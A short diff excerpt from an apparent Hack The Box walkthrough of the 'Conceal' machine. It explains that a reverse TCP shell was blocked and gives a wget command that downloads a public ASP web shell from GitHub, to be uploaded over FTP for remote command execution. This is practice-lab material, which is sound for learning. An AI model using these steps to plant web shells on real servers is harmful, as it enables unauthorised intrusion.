Anymuz/HackTheBox-Walkthroughs/Conceal/Conceal.md

 The page is stating that the page cannot be loaded due to the filename extension.
 This is with all formats - except the ASP format which just shows a blank page.
 This means that the web server can execute asp files, however my listener does not catch a connection, the reverse TCP is being blocked.

 ASP files can still be used to execute server commands in the form of a web shell, unlike a reverse TCP which creates a connection between two hosts, a web shell will take a command input parameter and then execute it, thereby facilitating remote command execution.
-There is an asp web shell made by tennc on github that we can download and use from ``wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.asp`` and upload it to the FTP.
+There is an asp web shell made by tennc on github that we can download and use with ``wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.asp`` then upload it to the FTP.

 ![img](assets/github_shell.png)